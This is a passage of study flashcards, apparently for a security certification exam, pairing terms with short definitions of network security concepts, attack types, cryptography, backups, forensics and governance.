A type of firewall that inspects traffic leaving the inside network as it goes out to the Internet. Then, when returning traffic from the same session (as identified by source and destination IP addresses and port numbers) attempts to enter the inside network, this firewall permits that traffic.
server-side execution and validation
A type of input validation that indicates that the code runs on the server, such as a web server.
Active/active load balancing
A type of load balancing where all servers are active and load balancer can use any of the servers at any time.
Active-passive load balancing
A type of load balancing where some servers are active and others on standby. A standby is used if an active fails, and it takes the previously active server offline until its repaired.
Zero trust network
A type of network segmentation where no traffic is authorized. Each user and machine must validate or verify who they are before accessing resources.
Forward Proxy Server
A type of proxy server that acts as middleman between clients and servers, making requests to network servers on behalf of clients. Results are sent to the proxy server, which then passes them to the original client.
Reverse Proxy Server
A type of proxy server that acts on behalf of its servers, which gathers information from its associated servers, and hands that information to the clients.
SCADA
A type of system architecture that combines data acquisition and control devices, computers, communications capabilities, and an interface to control and monitor the entire architecture.
Containers
A type of virtualization that allows for shared operating systems for more resource savings and faster execution
Remote access VPN
A user-to-LAN virtual private network connection used by remote users.
Bandwidth monitors
A utility designed to measure network bandwidth usage over time; the higher it is the more resources are being used, hence slower systems.
Quality of Service
A variety of techniques that control the flow of network traffic, improve transmission speeds, and improve real-time communications traffic
sFlow
A vendor-neutral industry standard for traffic analysis and data exporters at layer 2 of the OSI reference model.
Site-to-site VPN
A virtual private network in which multiple sites can connect to other sites over the Internet.
Zero-day exploit
A vulnerability that is exploited before the software creator/vendor is even aware of its existence.
Binary
A way of representing information using only two options (0 and 1).
Cross-Site Scripting (XSS)
A web application vulnerability. Attackers embed malicious HTML or JavaScript code into a web site's code, which executes when a user visits the site.
Aggregators
A website or software application that gathers together information from a variety of internet sources.
Secure Multipurpose Internet Mail Extensions
A widely accepted protocol for sending digitally signed and encrypted messages.
Disassociation attack
A wireless attack in which false de-authentication or disassociation frames are sent to an AP that appear to come from another client device, causing the client to disconnect.
NFC
A wireless technology that lets your mobile device communicate over very short distances, such as when paying for goods on wireless payment devices.
Business Partnership Agreement (BPA)
A written agreement defining the terms and conditions of a business partnership; exists when two organizations agree to do business with each other in a partnership.
Privacy notice
A written explanation of how the company handles and shares your personal financial information.
Chain of custody
A written record of all people who have had possession of an item of evidence; simple sign-off and documentation forms; each time the drive, device, or artifact is accessed, transferred, or otherwise handled, it is documented.
Name 3 Layer 2 attacks
ARP poisoning, MAC flooding, MAC cloning
Examples of personnel policies important to organizational security
Acceptable use policy Job rotation Mandatory vacation Separation of duties Least privilege Clean desk space Background checks Non-disclosure agreement Social media analysis Onboarding Offboarding User training
Card cloning
Act of using acquired information from a skimmer that can be made into a duplicate card, most commonly found when duplicating gift cards; can't duplicate chips, only magnetic strips
Vertical Scalability
Adding resources to one machine to accommodate additional work; requires a more powerful system or device
SSH keys
Additional authentication method that SFTP uses to ensure that data is secure
Advisories and bulletins
Advisories and bulletins provide detailed updates on cyber threats. They are usually updated weekly.
Two types of Network access control implementations
Agent and agentless
Symmetric key algorithms
Algorithm that uses the same key to perform both encryption and decryption; sender encrypts with the shared secret key and the receiver decrypts with it.
Asymmetric key algorithms
Also known as Public Key Algorithms; each user has two keys: a public key which is shared with all users and a private key which is a secret and only known to the user.
rsyslog
Alternative 'rocket-fast' version of syslog; useful when speed is necessary; supports extremely high message rates, secure logging via TLS, and TCP-based messages as well as multiple backend database options.
Integrity measurement
An "attestation mechanism" designed to ensure that an application is running only known and approved executables.
Privacy Enhanced Mail
An ASCII text format of digital certificates; normally stored in files with the .PEM or .CRT extensions.
Extensible Authentication Protocol-FAST
An EAP protocol developed by Cisco; used in wireless networks and point-to-point connections to perform session authentication. Its purpose is to replace the LEAP (lightweight extensible authentication protocol).
Extensible Authentication Protocol-TTLS
An EAP protocol that extends TLS.; the client can, but does not have to be authenticated via a CA-signed PKI certificate to the server.
Inline sensor
An IDPS sensor that is inserted into a network segment so that the traffic that it is monitoring must pass through the sensor; intended for network perimeter use and deployed in close proximity to a perimeter firewall to detect incoming attacks that could overwhelm the firewall.
Passive sensor
An IDPS sensor that monitors the traffic via a copying process, so the actual traffic does not flow through or depend upon the sensor for connectivity
IEEE 802.1x
An IEEE standard for port-based network access control (PNAC) on wired and wireless access points.
Virtual IP address
An IP address that can be shared by a group of routers.
Authentication Header
An IPSec component that provides connectionless integrity and the authentication of data. It also provides protection versus replay attacks.
Encapsulating Security Payload
An IPSec component that provides the same services as AH but also provides confidentiality when sending data.
Managed service provider
An IT service where the customer dictates both the technology and operational procedures, and an external party executes administration and operational support according to a contract.
arp
An Internet protocol and command-line utility used to map an IP address to a MAC address.
Structured Threat Information eXpression (STIX)
An XML structured language for expressing and sharing threat intelligence; originally sponsored by the US Department of Homeland Security.
Security Assertion Markup Language (SAML)
An XML-based standard used to exchange authentication and authorization information.
Role-Based Access Control (RBAC)
An access control model that bases the access control authorizations on the roles (or functions) that the user is assigned within an organization
Rule-Based Access Control
An access control model that can dynamically assign roles to subjects based on a set of rules defined by a custodian.
Attribute-based access control (ABAC)
An access control model that grants access to resources based on attributes assigned to subjects and objects.
Log reviews
An activity conducted to ensure privileged users are not abusing their privileges; this activity would be used to detect anomalies on a network
War flying
An activity consisting of using an airplane and a Wi-Fi-equipped computer, such as a laptop or a PDA, to detect Wi-Fi wireless networks.
Memorandum of Understanding (MOU)
An agreement between two or more parties to enable them to work together that is not legally enforceable but is more formal than an unwritten agreement; an informal mechanism that allows the parties to document their relationship to avoid future misunderstandings.
End of life/End of service life agreement
An agreement between two parties that ensures an orderly transition or outlines what steps will be taken when a vendor relationship ends or the vendor is discontinuing a product or service on which the organization depends.
HMAC algorithm
An algorithm that implements a partial digital signature; it guarantees the integrity of a message during transmission, but it does not provide for nonrepudiation
Elliptic-curve cryptography
An algorithm that uses elliptic curves instead of prime numbers to compute keys; based on the fact that finding the discrete logarithm of a random elliptic curve element with respect to a publicly known base point is difficult to the point of being impractical to do so.
syslog-ng
An alternative to syslog that provides enhanced filtering, direct logging to databases, and support for sending logs via TCP protected by TLS.
Integer overflow
An application attack that attempts to use or create a numeric value that is too big for an application to handle. Input handling and error handling thwart the attack.
Authentication applications
An application that functions by accepting user input, and if the user input is correct, it can pass the appropriate credentials to the system requesting authentication.
Certificate pinning
An approach to verifying a certificate by instructing browsers to attach a certificate to a subject for an extended period of time. When sites do this, the browser associates that site with their public key. This allows administrators or users to notice and intervene if a certificate unexpectedly changes.
Indicators of Compromise (IoCs)
An artifact observed on a network or in operating system that with high confidence indicates a computer intrusion; represents intrusion signature; IDS can be tuned to watch for the signature to prevent future compromise
Media access control (MAC) cloning
An attack in which an attacker falsifies the factory-assigned MAC address of a device's network interface
Brute force attack
An attack on passwords or encryption that tries every possible password or encryption key.
Smurf attack
An attack that broadcasts a ping request to computers yet changes the address so that all responses are sent to the victim.
Domain hijacking
An attack that changes the registration of a domain name without permission from the owner.
Address Resolution Protocol (ARP) poisoning
An attack that convinces the network that the attacker's MAC address is the one associated with an allowed address so that traffic is wrongly sent to the attacker's machine
Impersonation
An attack that creates a fictitious character and then plays out the role of that person on a victim.
Privilege Escalation
An attack that exploits a vulnerability in software to gain access to resources that the user normally would be restricted from accessing.
UDP floods
An attack that sends a large number of UDP packets to random ports on the victim's system. The system will notice that no application listens at that port and reply with an ICMP destination unreachable packet. If a large enough number of UDP packets are sent, the victim will be forced to send numerous ICMP packets in response, overwhelming the system.
ICMP floods
An attack that sends massive numbers of ICMP packets, with each requesting a response; require more aggregate bandwidth on the side of the attacker than the defender has, which is why a DDoS via ICMP may be attempted; sometimes referred to as ping floods
Media access control (MAC) flooding
An attack that sends numerous packets to a switch, each of which has a different source MAC address, in an attempt to use up the memory on the switch. If this is successful, the switch will change state to failopen mode.
Uniform Resource Location (URL) redirection
An attack that sends unsuspecting web users to untrusted sites.
DNS poisoning
An attack that substitutes DNS addresses so that the computer is automatically redirected to an attacker's device.
Christmas Tree attack
An attack that uses an IP packet with every option turned on for the protocol being used. Used to conduct reconnaissance by scanning for open ports and a DoS attack if sent in large numbers
OpenID
An authentication protocol that works across participating sites; an open standard and decentralized authentication protocol.
Knowledge-based authentication
An authentication technique that requires the user to provide a pre-established piece or several pieces of information that he/she knows.
Collector
An automated sensor that gathers actual state data. Part of the collection system.
Full tunnel VPN
An encrypted connection used with VPN's in which all of the traffic from the user is encrypted once they connect to the VPN.
Split tunnel VPN
An encrypted connection used with VPN's that only encrypts traffic going to private IP addresses used in the private network.
Hypertext Transfer Protocol Secure
An encrypted form of information transfer on the Internet that combines HTTP and TLS
Block cipher
An encryption method that operates on "chunks" of a message and applies the encryption algorithm to an entire message chunk at the same time; An encryption method that encrypts data in fixed-sized blocks.
Stream cipher
An encryption method that takes one character and replaces it with another; operates on one character or bit of a message at a time
Counter-mode/CBC-MAC protocol
An encryption protocol designed for Wireless LAN products that implements the standards of the IEEE 802.11i amendment to the original IEEE 802.11 standard.
hping
An enhanced Ping utility for crafting TCP and UDP packets to be used in port-scanning activities.
Hybrid cloud
An environment that includes two or more private, public, or community clouds, but each cloud remains separate and is only linked by technology that enables data and application portability
Private cloud
An environment that serves only one customer or organization and can be located on the customer's premises or off the customer's premises.
Development Environment
An environment used to create or modify IT services or applications.
Capture the flag (CTF)
An exploit-based exercise simulating an attack; programs that pit technologists against one another in an attempt to attack a system and achieve a specific goal, such as stealing a sensitive file.
Certificate stapling
An extension to the OCSP that relieves some of the burden placed upon CAs by the original protocol; instead of the end user being responsible for contacting an OCSP server to verify the certificate's validity, the web server contacts the OCSP server itself and receives a signed and timestamped response from the OCSP server, which it then attaches, or staples, to the digital certificate.
Radio Frequency Identification (RFID)
An identification method that uses electronic tags and labels to identify objects wirelessly over short distances
Cloud security alliance
An industry organization focused on developing and promoting best practices in cloud security.
Unified Extensible Firmware Interface (UEFI)
An interface between firmware on the motherboard and the operating system; improves on legacy BIOS processes for booting, handing over the boot to the OS, and loading device drivers and applications before the OS loads.
Challenge Handshake Authentication Protocol (CHAP)
An older three-way authentication handshake that is accomplished during the initial authentication and may be repeated anytime after the link has been established; a weak authentication protocol that has been replaced by the Extensible Authentication Protocol (EAP).
Common Vulnerabilities and Exposures (CVE)
An online list of known vulnerabilities (and patches) to software, especially web servers. It is maintained by the MITRE Corporation.
OAuth
An open source standard used for authorization with Internet-based single sign-on solutions.
IPFIX
An open standard based on NetFlow 9 that many vendors support; a standard format for exporting router-based information about network traffic flows to data collection devices
NXLog
An open-source alternative to syslog and commercially supported syslog centralization and aggregation tool that can parse and generate log files in many common formats while also sending logs to analysis tools and SIEM solutions.
Autopsy (utility)
An open-source forensic suite with broad capabilities.
Real-Time Operating System
An operating system that reacts to current events and actions occurring around it; used when priority needs to be placed on processing data as it comes in, rather than using interrupts for the OS or waiting for tasks being processed to be handled before data is processed.
Restoration order
An order of what needs to be in place and operational first in the case of a disaster; decisions that balance the criticality of systems and services to the operation of the organization against the need for other infrastructure to be in place and operational to allow each component to be online, secure, and otherwise running properly.
International Organization for Standardization (ISO)
An organization that publishes a series of standards that offer best practices for cybersecurity and privacy.
Mandatory vacation
An organizational policy that serves a similar purpose as job rotation; this practice forces employees to take annual vacations of a week or more consecutive time and revoking their access privileges during that vacation period.
Job rotation
An organizational practice that takes employees with sensitive roles and moves them periodically to other positions in the organization. The motivating force behind these efforts is that many types of fraud require ongoing concealment activities., which makes it harder to accomplish if an employee does not remain in the same role for an extended period of time.
Plaintext/Cleartext
An original message or file that has not yet been encrypted
Rogue access point
An unauthorized AP that allows an attacker to bypass many of the network security configurations and opens the network and its users to attacks.
Push notifications
Any content sent to a mobile device that a customer must opt in to receive from a marketer.
Key exchange
Any method by which cryptographic keys are transferred among users, thus enabling the use of a cryptographic algorithm.
Three options for reconfiguring endpoint security solutions
Application allow list, application deny/block list, quarantine filter
Thirteen implementations that can be done using MDM
Application management Content management Remote wipe Geofencing Screen locks Push notifications Passwords and PINs Biometrics Context-aware authentication Containerization Storage segmentation Full device encryption
Wireshark
Application that captures and analyzes network packets; a popular packet sniffer.
Standard Naming Convention
Applying consistent names and labels to assets and digital resources/identities within a configuration management system.
Resource policies
Assigning permissions to cloud resources; can be difficult since the cloud is always running.
Volume-based network DDoS attacks
Attacks that focus on the sheer amount of traffic causing a DoS condition; some rely on amplification techniques that leverage flaws or features in protocols and services to create significantly more traffic than the attacker sends
Protocol-based DDoS attacks
Attacks that focus on the underlying protocols used for networking
Three As that compose the framework for intelligently controlling access to computer resources, enforcing policies, auditing usage, and providing the information necessary to bill for services.
Authentication, authorization, and accounting
Automated Courses of Action
Automated scripts that give a basis for secured configuration with a secured template. Can be configured to accommodate for constant changes or can be launched on a specific schedule.
Vulnerability scans
Automated tools designed to identify whether a given system possesses any well-known vulnerabilities.
Five deployment models used by organizations for devices
BYOD, COPE, CO, CYOD, VDI
Cloud backup
Backup method in which files are backed up to the cloud as they change; long-term archival storage models that are used for data that is unlikely to be needed; examples are Amazon's Glacier and Google's Coldline
Differential backup
Backup that copies all changes made since the last full backup
Full backup
Backup that copies all data from a system.
Incremental backup
Backup that copies only the changed data since the last backup.
Offline backup
Backups that need to be retrieved from a storage location before they can be accessed; not done over the Internet.
Honeyfile
Bait files intended for hackers to access. The files reside on a file server, and the server sends an alarm when accessed.
Facial scan
Biometric control that compares a picture of a face to pictures stored in a database
Retina scan
Biometric laser scan of the capillaries which feed the retina (blood vessel pattern).
Gait analysis
Biometric mechanism that identifies a subject based on movement pattern.
Four categories of security locks
Biometrics, electronic, physical, cable
Two major categories of modern ciphers/cipher suites
Block and stream
Five options for secure data destruction
Burning, shredding, pulping, pulverizing, degaussing
Examples of sources of information acquisition
CPU cache, ephemeral data, RAM, Swap and pagefile information, files and data on a disk change, OS, mobile devices, firmware, snapshots, network traffic and logs, artifacts (devices, printouts, media, etc.)
2 examples of vulnerability databases
CVE (Common vulnerabilities and exposures) U.S. National Vulnerability Database (NVD)
Two simple examples of substitution ciphers
Caesar cipher and ROT13
Motion recognition cameras
Cameras that activate when motion occurs
Object detection cameras
Cameras that can detect specific objects, or they have areas that they watch for changes
Examples of user training methodologies
Capture the flag, gamification, phishing simulations, computer-based training, role-based training
Redundant NICs
Cards used to ensure connectivity in situations where a system's availability is important and multiple systems cannot be reasonably used.
Supervisory Control and Data Acquisition
Centralized systems which monitor and control industrial sites, or complexes of systems spread out over large areas; large systems that run power and water distribution or other systems that cover large areas
Self-signed certificates
Certificates signed by an organization for their employees; these certificates won't be trusted by the browsers of external users, but internal systems may be configured to trust the internal CA, saving the expense of obtaining certificates from a third-party CA.
What tools are available to search for rootkits?
Chkrootkit, rkhunter
Code reuse/dead code
Code that can be used for some future use, project, etc. Typically better to write clean code that can be minimally modified/refactored in the future.
Static codes
Codes that do not change over time.
Virtual machine sprawl avoidance
Combating VM sprawl through using different procedures.
Provisioning and deprovisioning
Commission/Decommission of assets from the time it is installed, until the time it is decommissioned and disposed.
Vulnerability databases
Common source of threat intelligence, researchers find vulnerabilities and upload them here because everyone needs to know about them.
Four critical incident response plans
Communication plan Stakeholder management Disaster recovery plan Business continuity plan
Cloud service providers
Companies that provide software, data storage, and other services via the internet
Third party data destruction services
Companies that will pick up and remove sensitive documents and media for shredding at their facility, or they will perform the same service on-site; your organization may opt for a thoroughly documented destruction process, including photos of the devices and per-device destruction certification depending on their security needs.
Industrial Control Systems
Computer based systems that monitor and control industrial processes that exist in the physical world; a broad term for industrial automation
Embedded systems
Computer system(s) hidden inside another device, such as a car engine management system, appliances, or industrial machinery
Digital certificates provide communicating parties with the assurance that the people they are communicating with truly are who they claim to be. They also provide assurance for the public keys of...
Computers/machines Individual users Email addresses Developers (code-signing certificates)
On-premise
Computing resources hosted locally in a company's data center or physical location.
Off-premise
Computing resources hosted remotely from a company's data center.
Cellular connection
Connection that provides high speed transmission over cell phone towers.
Infrared
Connection to a line-of-sight wireless network to access technologies, such as TV and other audiovisual equipment.
Storage area networks
Connects multiple storage devices on a separate high-speed network dedicated to storage (backup); can also be used as a means of replicating data, where it uses RAID to ensure that data is not lost.
Compensating controls
Controls designed to mitigate the risk associated with exceptions made to a security policy.
Detective controls
Controls that identify security events that have already occurred. IDS systems are an example of this.
Preventive controls
Controls that intend to stop a security issue before it occurs. Firewalls and encryption are examples of this.
Corrective controls
Controls that remediate security issues that have already occurred. Restoring backups after a ransomware attack is an example of this.
Deterrent controls
Controls that seek to prevent an attacker from attempting to violate security policies. Vicious guard dogs and barbed wire fences are examples of this.
Secure cookies
Cookies that have the secure attribute set so that they can only be transmitted over a TLS encrypted session.
Virtualization
Creates multiple "virtual" machines on a single computing device; the practice of sharing or pooling computing resources, such as servers and storage devices.
Smart card authentication
Credit card-sized card with embedded integrated circuits that is used to provide identification security authentication.
Lightweight cryptography
Cryptographic algorithms with reduced compute requirements that are suitable for use in resource-constrained environments, such as battery-powered devices.
Threat feeds
Cybersecurity data feeds that provide information on the latest threats.
Operational technology DDoS
DDoS attacks that target the hardware and software that controls devices and systems in factories, buildings, powerplants, and other industries
Formats of digital certificates
DER, PEM, PFX, P7B
Three common symmetric cryptosystems
DES, 3DES, AES
Metadata
Data about other data; in the case of systems and services, this is created as part of files, embedded in documents, used to define structured data, and included in transactions and network communications, among many other places you can find it.
Three types of data policies every organization should have
Data classification, data governance, data retention
Mobile metadata
Data collected by phones and other mobile devices as they are used; includes call logs, SMS and other message data, data usage, GPS location tracking, cellular tower information, and other details found in call data records.
Web metadata
Data embedded into websites as part of the code of the website but is often invisible to everyday users; includes metatags, headers, cookies, and other information that help with search engine optimization, website functionality, advertising, and tracking, or that may support specific functionality.
7 common impacts of vulnerabilities
Data loss Data breaches Data exfiltration Identity theft Financial impact Reputation Availability loss
Five common privacy-enhancing technologies
Data minimization, data masking, tokenization, anonymization, pseudo-anonymization.
Email metadata
Data stored in the email about the email. Often this data is not even viewable in the email client application used to create the email. The amount of email metadata available for a particular email varies greatly depending on the email system.
Data in transit/motion
Data that is moving between computing nodes over a data network such as the Internet.
Data at rest
Data that is stored on electronic media.
East-west traffic
Design paradigm accounting for the fact that data center traffic between servers is greater than that passing in and out (north-south); traffic that moves laterally between servers
Cloud controls matrix
Developed by the CSA as a reference document designed to help organizations understand the appropriate use of cloud security controls and map those controls to various regulatory standards.
Sensors
Devices that collect input from the environment and provide information that the CPU can respond to.
Fire suppression systems
Devices that help with resiliency by reducing the potential for disastrous fires
Federation
Different computing entities adhering to a certain standard of operations in a collective manner to facilitate communication.
7 types of threat vectors
Direct access Wireless Email Supply Chain Social Media Removable media Cloud
Port Security
Disabling unused application/service ports to reduce the number of threat vectors; a Cisco switch feature that limits the number of MAC addresses allowed to communicate through a particular port
Swap/page file
Disk space used to supplement physical memory; space on a hard drive used as a temporary location to store information when random access memory (RAM) is fully utilized.
RAID 6
Disk striping with double parity. Like RAID 5, but with more parity data, which is stored on another drive.
Load balancing
Distributing a computing or networking workload across multiple systems to avoid congestion and slow performance.
Separation of duties
Dividing responsibilities between two or more people to limit fraud and promote accuracy of accounting records.
Skimming
Double-swiping a credit card in a legitimate terminal or covertly swiping a credit card in a small, hidden, handheld card reader that records credit card data for later use
Sideloading
Downloading an app from an unofficial third-party website.
Seven authentication protocols
EAP, PEAP, EAP-FAST, EAP-TLS, EAP-TTLS, IEEE 802.1X, RADIUS
Social media
Electronic media that allows people with similar interests to participate in a social network; a common element of influence campaigns
Four common types of metadata
Email, mobile, web, file
Horizontal scaling
Employ multiple computers to share workload; uses smaller systems or devices but adds more of them
Homomorphic encryption
Enables processing of encrypted data without the need to decrypt the data. It allows the cloud customer to upload data to a cloud service provider for processing without the requirement to decipher the data first.
Three main steps of certificate generation and destruction
Enrollment, verification, revocation
Next steps to take in notifying others of a breach
Escalation to key personnel involved in a cybersecurity incident response plan, and making a disclosure/notification to the public that aligns with the state's data breach laws.
SSL/TLS Inspection
Examine outgoing SSL/TLS. Relies on trust; the browser trusts the devices that it's connecting to across the network and is able to perform encryption from end-to-end; if this is broken then nothing will work.
Dynamic Code Analysis
Examining code after the source code is compiled and when all components are integrated and running; the analysis of the code as it is running.
Tabletop exercises
Exercises that simulate an emergency situation but in an informal and stress-free environment; team members are given a scenario and are asked questions about how they would respond, what issues might arise, and what they would need to do to accomplish the tasks they are assigned in the IR plan.
Stakeholder management plan
Explains how stakeholders will be identified along with their level of interest in the project and influence over the project. This is closely tied to the communications plan since stakeholders will need varying levels and frequency of information. Many SMPs will help with prioritization of which stakeholders will receive communications, what support they may need, and how they will be provided, with options to offer input or otherwise interact with the IR process, communications and support staff, or others involved in the response process.
Six types of security risks
External, internal, legacy systems, multiparty, IP theft, software compliance/licensing
ICS/SCADA systems are common in what environments?
Facilities management, industrial, manufacturing, energy, logistics
Efficacy rates
False acceptance rate (FAR) False rejection rate (FRR) Crossover error rate (CER)
Certificate attributes
Fields in an X.509 digital certificate that are used when parties negotiate a secure connection.
What kind of attack is commonly executed in PowerShell environments?
Fileless malware attacks, where PowerShell scripts are executed locally once a browser or plug-in is compromised
System logs
Files that store a variety of information about system events, including device changes, device drivers, and system changes; logs the events such as a system shutdown and driver failures
Application logs
Files that store actions performed by the application on the system. Often track items such as attempts to access the application, errors generated from the application, etc.; logs the events for the operating system and third-party applications.
VoIP/Call manager logs/SIP logs
Files that store information about calls that were placed as well as other events on a VoIP system.
Network/Security device logs
Files that store information about routers and switches with configuration changes, traffic information, network flows, and data captured by packet analyzers like Wireshark.
Authentication logs
Files that store information determining when an account was logged into and may also show privilege use, login system or location, incorrect password attempts, and other details of logins and usage that can be correlated to intrusions and misuse.
DNS logs
Files that store information on DNS queries to the server, including the source IP address of the request and the domain name of the destination IP address; these logs can show attackers gathering information, provide information that shows what systems may be compromised based on their DNS requests, and show whether internal users are misusing organizational resources.
Web logs
Files that store information such as requests to a web server and related events; these logs can help track what was accessed, when it was accessed, and what IP address sent the request; since requests are logged, these can also help identify attacks, including SQL injection and other web server and web application-specific attacks.
Dump files
Files that store information that shows the state of memory and the system at the time of a crash. If the crash occurred because of an attacker or exploit, or if malware or attack tools were on the system, these files may contain those artifacts.
Examples of biometric authentication methods
Fingerprint scan, retina scan, iris scan, facial scan, voice recognition, vein scan, gait analysis
Configuration changes to consider for remediation or containment
Firewall rule changes, MDM changes, DLP tool changes, content/URL filtering capabilities, updating or revoking certificates
Next-generation firewall
Firewall technology based on packet contents as opposed to simple address and port information.
Custom firmware
Firmware that is written by users to own and run on their own mobile devices.
WinHex
Forensics tool for Windows that allows collection and inspection of binary code in disk and memory images.
On-path attack
Formerly known as a man in the middle attack; occurs when the attacker redirects the victim's traffic without their knowledge.
Two types of proxy servers
Forward and reverse
Four types of backups
Full, incremental, differential, snapshot
Regulations that affect risk posture
GDPR, Sarbanes-Oxley Act (SOX), Health Insurance Portability Accountability Act (HIPAA), Payment Card Industry (PCI) and Data Security Standard (DSS), FERPA, GLBA, data breach notification laws
Quality Assurance (QA)
Gathering and evaluating information about the services provided as well as the results achieved and comparing this information with an accepted standard
Legacy systems risks
General term for risks associated with using a legacy system. These outdated systems often do not receive security updates and cybersecurity professionals must take extraordinary measures to protect them against un-patchable vulnerabilities.
Publishers of benchmarks/secure configuration guides
Government agencies, vendors, industry groups
Hacktivists
Hackers who are driven by a cause like social change, political agendas, or terrorism
Self-Encrypting Drive (SED)
Hard drives that encrypt all of the contents held within using encryption keys that are maintained independently from the CPU of the housing computer.
Load balancers
Hardware devices that are designed to split a particular network load across multiple servers; these make multiple systems or services appear to be a single resource
USB data blocker
Hardware plug to prevent malicious data transfer when a device is plugged into a USB charging point.
Two major categories of scalability
Horizontal and vertical
(Incident response) simulations
IR exercises that can include a variety of types of events, such as individual functions or elements of the plan, or only target specific parts of an organization. They can also be done at full scale, involving the entire organization in the exercise.
Four crucial ISO standards for cybersecurity
ISO 27001, 27002, 27701, 31000
Vein Recognition
Identifying uniqueness through blood vessels.
Transport mode
In IPSec, an encryption method in which only a packet's IP data is encrypted, not the IP headers themselves; this method allows intermediate nodes to read the source and destination addresses.
Tunnel mode
In IPSec, an encryption method in which the entire IP packet is encrypted and inserted as the payload in another IP packet. This requires other systems at the beginning and end of the tunnel to act as proxies to send and receive the encrypted packets and then transmit the packets to their ultimate destination.
SIEM Sensitivity
In a SIEM, the quality of being quick to detect or respond to slight changes, signals, or influences (important data); this data can be controlled/limited by setting thresholds, filter rules, and use other methods of managing this quality of the SIEM.
What efforts should be made with vendors in regards to NDAs?
In additional to employees, vendors may have access to sensitive information about your organization. Vendor agreements should also include NDA terms, and organizations should ensure that vendors ask their own employees to sign NDAs if they will have access to your sensitive information.
Transit gateway
In cloud computing, a virtual router deployed to facilitate connections between VPC subnets and VPN gateways; a network hub that acts as a regional virtual router to connect networks.
Time offset
In forensics, identifying whether a time zone offset has been applied to a file's time stamp; the amount of time added to or subtracted from Coordinated Universal Time (UTC) to arrive at the current local time.
Corporate-owned
In this traditional deployment model, the organization purchases devices and issues them to employees.
Intelligence fusion
In threat hunting, using sources of threat intelligence data to automate detection of adversary IoCs and TTPs.
Personally Identifiable Information (PII)
Includes any information that uniquely identifies an individual person, including customers, employees, and third parties.
Data steward
Individuals who carry out the intent of the data controller and are delegated responsibility from the controller.
Data owner
Individuals, normally managers or directors, who have responsibility for the integrity, accurate reporting and use of computerized data.
Script Kiddies
Inexperienced, usually young hackers who use programs that others have developed to attack computer and network systems and deface Web sites.
Government information
Information maintained by the organization that may be subject to other rules, including the data classification requirements of the US government.
Documents organizations commonly include in their information security library
Information security policy Acceptable use policy Data governance policy Data classification policy Data retention policy Credential management policy Password policy Continuous monitoring policy Code of conduct/ethics Change management/change control policies Asset management policies
Unclassified
Information that does not meet the standards for classification under the other categories; information in this category is still not publicly released without authorization; a US government "classification."
Financial information
Information that includes any personal finance records maintained by the organization.
Protected Health Information (PHI)
Information that includes medical records maintained by healthcare providers and other organizations that are subject to HIPAA.
Closed-Source (Proprietary) Intelligence
Information that is obtained through private sources and disseminated through paid-for subscription or membership services.
Open-Source Intelligence (OSINT)
Information that is readily available to the public and doesn't require any type of malicious activity to obtain.
Secret
Information that requires a substantial degree of protection. The unauthorized disclosure of this information could reasonably be expected to cause serious damage to national security; a US government classification.
Confidential
Information that requires some protection. The unauthorized disclosure of this information could reasonably be expected to cause identifiable damage to national security; a US government classification.
Top secret
Information that requires the highest degree of protection. The unauthorized disclosure of this information could reasonably be expected to cause exceptionally grave damage to national security; a US government classification.
Three different states of risk
Inherent risk, residual risk, risk appetite
Fuzzing
Injection of randomized data into a software program in an attempt to find system failures, memory leaks, error handling issues, and improper input validation
Two types of NIDS sensors
Inline and passive
client-side execution and validation
Input validation that is performed by the user's web browser.
Benchmarks/secure configuration guides
Instructions that have been developed over years that are designed to give organizations the best and most secure configurations for a particular system; get down into the nitty-gritty details of securely operating commonly used systems.
Cybersecurity insurance
Insurance that protects an organization by monetary compensation in the event of a successful cybersecurity attack.
4 sources for threat hunters
Intelligence fusion Threat feeds Advisories and bulletins Maneuver
Disaster types to have documented in a DRP
Internal and external risks from both environmental and man-made disasters.
4 attributes of threat actors
Internal/External Level of sophistication/capability Resources/funding Intent/motivation
Identity fraud
Involves the unauthorized use of another person's personal data for illegal and/or financial benefit
Why is PowerShell so easy to leverage attacks on?
It allows remote and local execution, network access, and many other capabilities; in addition, it is available by default on Windows systems and is often not carefully monitored
Four issues with symmetric key cryptography
Key distribution is a major problem; does not implement nonrepudiation; algorithm is not scalable; key must be regenerated often
Examples of documentation/evidence produced by digital forensics
Legal holds, video, admissibility, chain of custody, timelines of sequence of events, tags, reports, event logs, interviews
Two factors used to evaluate risk
Likelihood of occurrence and magnitude of the impact
Certificate chaining
Linking several certificates together to establish trust between all the certificates involved; the use of a series of intermediate CAs.
grep (command)
Linux command for searching and filtering input. This can be used as a file search tool when combined with ls.
logger (command)
Linux utility that writes data to the system log.
Security logs
Logs the events such as successful and unsuccessful user logins to the system; logs that are considered the primary source of log data.
Three major attack frameworks
MITRE ATT&CK, Diamond Model of Intrusion Analysis, Lockheed Martin's Cyber Kill chain
Commonly used agreements between organizations and third parties
MSA, SLA, MOU, BPAs
Four key metrics used in a BIA
MTBF, MTTR, RTO, RPO
What kind of attack is commonly executed in VBA environments?
Macro viruses
Continuous monitoring
Maintaining ongoing awareness to support organizational risk decisions.
Unauthorized hackers
Malicious hackers that violate security for personal gain (Black Hat)
Cryptomalware
Malware that encrypts the user's data; also called ransomware.
Seven examples of specialized embedded systems
Medical systems, smart meters, vehicles/aircraft, drones/AVs, VoIP systems, MFPs, surveillance systems
File metadata
Metadata that describes interesting properties about the files that are not related to the main content of the file; information about a file that can include the creation, modified and last access dates, and also the user who created the file
Edge computing
Method of optimizing cloud computing systems by performing some data processing on a set of linked servers at the edge of the network, near the source of the data.
RAID 10
Mirroring and striping data; a combination of RAID 1 and RAID 0; data is striped across two or more drives and then mirrored to the same number of drives
RAID 1
Mirroring data; all data is copied exactly to another drive or drives
Rich Communication Services (RCS)
Mobile device communication which can convert a texting app into a live chat platform and supports pictures, videos, location, stickers, and emojis.
Two types of security camera capabilities
Motion recognition and object detection
Six security constraints of embedded systems
Much lower computational/electrical power; may not connect to a network/ineffective range; inability to patch; authentication is likely impossible; can be effectively very high cost; may rely on implied trust
RADIUS Federation
Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations; should be implemented if all the organizations use the native 802.1x client on their mobile devices.
Common name
Name that clearly describes the certificate owner (e.g., "certmike.com"
Subject alternative names
Names that allow you to specify additional items (IP addresses, domain names, and so on) to be protected by the single certificate
Two types of radio frequency systems
Narrowband and wideband
The three types of DDoS attacks
Network, application, and operational technology (OT)
Thin client
Networking system whereby client computers rely on servers to perform their processing tasks.
Extensible Authentication Protocol (EAP)
Not an authentication mechanism in itself but instead defines message formats. 802.1X would be the authentication mechanism and defines how this is encapsulated within messages; a framework for transporting authentication protocols that defines the format of the messages.
Race conditions
